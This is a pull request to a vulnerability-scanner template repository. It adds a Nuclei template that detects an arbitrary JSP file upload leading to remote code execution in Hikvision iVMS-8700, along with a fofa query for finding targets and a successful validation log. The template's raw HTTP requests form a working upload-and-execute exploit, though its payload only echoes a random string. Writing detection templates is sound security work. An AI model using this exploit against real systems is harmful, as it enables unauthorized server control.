### PR TITLE
Added Hikvision iVMS-8700 - File Upload Remote Code Execution

### DIFF
--- a/http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml
+++ b/http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml
@@ -1,0 +1,51 @@
+id: hikvision-ivms-file-upload-rce
+
+info:
+  name: Hikvision iVMS-8700 - File Upload Remote Code Execution
+  author: brucelsone
+  severity: critical
+  description: |
+    Arbitrary file upload vulnerability in HIKVISION iVMS-8700 Integrated Security Management Platform Software allows attackers to upload and execute malicious files, leading to potential unauthorized server control.
+  reference:
+    - https://www.wangan.com/p/11v754aceadb994f
+    - https://cn-sec.com/archives/1828326.html
+  metadata:
+    max-request: 2
+    fofa-query: icon_hash="-911494769"
+  tags: hikvision,ivms,fileupload,rce,intrusive
+
+variables:
+  str1: '{{rand_base(6)}}'
+  str2: '{{rand_base(6)}}'
+  str3: '<%out.print("{{str2}}");%>'
+
+http:
+  - raw:
+      - |
+        POST /eps/resourceOperations/upload.action HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: MicroMessenger
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj
+
+        ------WebKitFormBoundaryTJyhtTNqdMNLZLhj
+        Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp"
+        Content-Type: image/jpeg
+
+        {{str3}}
+        ------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
+
+      - |
+        GET /eps/upload/{{res_id}}.jsp HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: json
+        name: res_id
+        json:
+          - ".data.resourceUuid"
+        internal: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - body_2 == str2


### PR DESCRIPTION
### Template / PR Information

Closes #7535

  Reference:
    - https://www.wangan.com/p/11v754aceadb994f
    - https://cn-sec.com/archives/1828326.html

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

```console
nuclei -t http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml -target REDACTED

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.9.6

		projectdiscovery.io

[INF] Current nuclei version: v2.9.6 (latest)
[INF] Current nuclei-templates version: v9.5.3 (latest)
[INF] New templates added in latest release: 82
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[hikvision-ivms-file-upload-rce] [http] [critical] REDACTED/eps/upload/ef5bee0f39784649b478cf8db5a6026a.jsp
```

#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)